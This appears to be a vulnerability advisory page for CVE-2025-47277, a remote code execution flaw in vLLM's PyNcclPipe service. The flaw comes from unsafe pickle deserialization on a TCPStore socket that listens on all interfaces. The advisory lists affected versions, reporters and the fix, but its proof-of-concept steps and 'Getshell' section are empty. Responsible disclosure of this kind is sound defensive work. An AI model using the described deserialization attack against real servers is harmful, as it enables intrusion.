Описание
vLLM Allows Remote Code Execution via PyNcclPipe Communication Service
Impacted Environments
This issue ONLY impacts environments using the PyNcclPipe
KV cache transfer integration with the V0 engine. No other configurations are affected.
Summary
vLLM supports the use of the PyNcclPipe
class to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through the PyNcclCommunicator
class, while CPU-side control message passing is handled via the send_obj
and recv_obj
methods on the CPU side.
A remote code execution vulnerability exists in the PyNcclPipe
service. Attackers can exploit this by sending malicious serialized data to gain server control privileges.
The intention was that this interface should only be exposed to a private network using the IP address specified by the --kv-ip
CLI parameter. The vLLM documentation covers how this must be limited to a secured network: https://docs.vllm.ai/en/latest/deployment/security.html
Unfortunately, the default behavior from PyTorch is that the TCPStore
interface will listen on ALL interfaces, regardless of what IP address is provided. The IP address given was only used as a client-side address to use. vLLM was fixed to use a workaround to force the TCPStore
instance to bind its socket to a specified private interface.
This issue was reported privately to PyTorch and they determined that this behavior was intentional.
Details
The PyNcclPipe
implementation contains a critical security flaw where it directly processes client-provided data using pickle.loads
, creating an unsafe deserialization vulnerability that can lead to Remote Code Execution.
- Deploy a
PyNcclPipe
service configured to listen on port18888
when launched:
- The attacker crafts malicious packets and sends them to the
PyNcclPipe
service:
The call stack triggering RCE is as follows:
Getshell as follows:
Reporters
This issue was reported independently by three different parties:
- @kikayli (Zhuque Lab, Tencent)
- @omjeki
- Russell Bryant (@russellb)
Fix
- https://github.com/vllm-project/vllm/pull/15988 -- vLLM now limits the
TCPStore
socket to the private interface as configured.
Ссылки
- https://github.com/vllm-project/vllm/security/advisories/GHSA-hjq4-87xh-g4fv
- https://nvd.nist.gov/vuln/detail/CVE-2025-47277
- https://github.com/vllm-project/vllm/pull/15988
- https://github.com/vllm-project/vllm/commit/0d6e187e88874c39cda7409cf673f9e6546893e7
- https://docs.vllm.ai/en/latest/deployment/security.html
Пакеты
vllm
>= 0.6.5, < 0.8.5
0.8.5
Связанные уязвимости
vLLM, an inference and serving engine for large language models (LLMs), has an issue in versions 0.6.5 through 0.8.4 that ONLY impacts environments using the `PyNcclPipe` KV cache transfer integration with the V0 engine. No other configurations are affected. vLLM supports the use of the `PyNcclPipe` class to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through the `PyNcclCommunicator` class, while CPU-side control message passing is handled via the `send_obj` and `recv_obj` methods on the CPU side. The intention was that this interface should only be exposed to a private network using the IP address specified by the `--kv-ip` CLI parameter. The vLLM documentation covers how this must be limited to a secured network. The default and intentional behavior from PyTorch is that the `TCPStore` interface listens on ALL interfaces, regardless of what IP address is provided. The IP ...
vLLM, an inference and serving engine for large language models (LLMs), has an issue in versions 0.6.5 through 0.8.4 that ONLY impacts environments using the `PyNcclPipe` KV cache transfer integration with the V0 engine. No other configurations are affected. vLLM supports the use of the `PyNcclPipe` class to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through the `PyNcclCommunicator` class, while CPU-side control message passing is handled via the `send_obj` and `recv_obj` methods on the CPU side. The intention was that this interface should only be exposed to a private network using the IP address specified by the `--kv-ip` CLI parameter. The vLLM documentation covers how this must be limited to a secured network. The default and intentional behavior from PyTorch is that the `TCPStore` interface listens on ALL interfaces, regardless of what IP address is provided. The IP add
vLLM, an inference and serving engine for large language models (LLMs) ...